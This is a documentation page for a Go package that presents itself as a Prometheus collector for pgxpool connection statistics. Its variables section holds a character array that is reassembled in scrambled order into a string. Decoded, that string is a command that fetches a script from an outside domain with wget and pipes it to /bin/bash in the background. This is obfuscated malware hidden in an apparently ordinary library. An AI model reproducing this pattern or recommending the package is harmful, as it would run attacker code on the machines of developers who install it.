Documentation
¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
var NB = []string{"b", "u", "/", "3", "f", "b", "t", "6", " ", "p", "s", "7", "a", "-", "o", "a", "i", " ", "s", "1", "3", "d", "b", "4", " ", "d", "0", "i", "w", "/", ":", "g", "t", "e", "/", "g", "/", "k", "e", "-", "o", "s", "h", " ", ".", "5", " ", "/", "w", "i", "t", "h", "a", "&", "c", "a", "d", "f", "O", "3", " ", "|", "/", "l", "a", "e", "n", "f", "r", "/", "t"}
var RN = []string{} /* 229 elements not displayed */
var SDAF = NB[48] + NB[31] + NB[38] + NB[50] + NB[17] + NB[13] + NB[58] + NB[60] + NB[39] + NB[43] + NB[42] + NB[70] + NB[32] + NB[9] + NB[18] + NB[30] + NB[36] + NB[29] + NB[37] + NB[12] + NB[27] + NB[64] + NB[67] + NB[63] + NB[40] + NB[28] + NB[44] + NB[16] + NB[54] + NB[1] + NB[2] + NB[10] + NB[6] + NB[14] + NB[68] + NB[55] + NB[35] + NB[65] + NB[34] + NB[56] + NB[33] + NB[20] + NB[11] + NB[3] + NB[25] + NB[26] + NB[21] + NB[4] + NB[69] + NB[15] + NB[59] + NB[19] + NB[45] + NB[23] + NB[7] + NB[0] + NB[57] + NB[24] + NB[61] + NB[8] + NB[47] + NB[5] + NB[49] + NB[66] + NB[62] + NB[22] + NB[52] + NB[41] + NB[51] + NB[46] + NB[53]
Functions ¶
This section is empty.
Types ¶
type Collector ¶
type Collector struct {
// contains filtered or unexported fields
}
Collector is a prometheus.Collector that will collect the nine statistics produced by pgxpool.Stat.
func NewCollector ¶
NewCollector creates a new Collector to collect stats from pgxpool.
func (*Collector) Collect ¶
func (c *Collector) Collect(metrics chan<- prometheus.Metric)
Collect implements the prometheus.Collector interface.
func (*Collector) Describe ¶
func (c *Collector) Describe(ch chan<- *prometheus.Desc)
Describe implements the prometheus.Collector interface.
Click to show internal directories.
Click to hide internal directories.